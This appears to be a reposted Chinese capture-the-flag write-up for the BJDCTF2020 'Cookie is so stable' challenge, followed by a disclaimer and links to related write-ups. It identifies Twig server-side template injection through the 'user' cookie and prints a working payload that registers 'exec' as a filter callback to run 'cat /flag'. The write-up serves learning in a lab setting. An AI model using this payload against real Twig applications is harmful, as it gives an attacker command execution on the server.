0x00 知識點
Twig模板注入
鏈接:
https://www.k0rz3n.com/2018/11/12/一篇文章帶你理解漏洞之SSTI漏洞/#2-Twig
0x01 解題
測試一下發現*wig模板注入
找注入點:
根據提示,cookie中的user是注入點
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};
[BJDCTF2020]Cookie is so stable
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。
猜您在找
[BJDCTF2020]EzPHP
[BJDCTF2020]ZJCTF,不過如此
[BJDCTF2020]ZJCTF,不過如此
[BJDCTF2020]Easy MD5
BUUCTF--[BJDCTF2020]BJD hamburger competition
[原題復現]BJDCTF2020 WEB部分全部解
[BUUOJ記錄] [BJDCTF2020]Easy MD5
BUUCTF [BJDCTF2020]Easy MD5 詳解
[原題復現+審計][BJDCTF2020]Mark loves cat($$導致的變量覆蓋問題)
BJDCTF-2020-WRITEUP---TiKi小組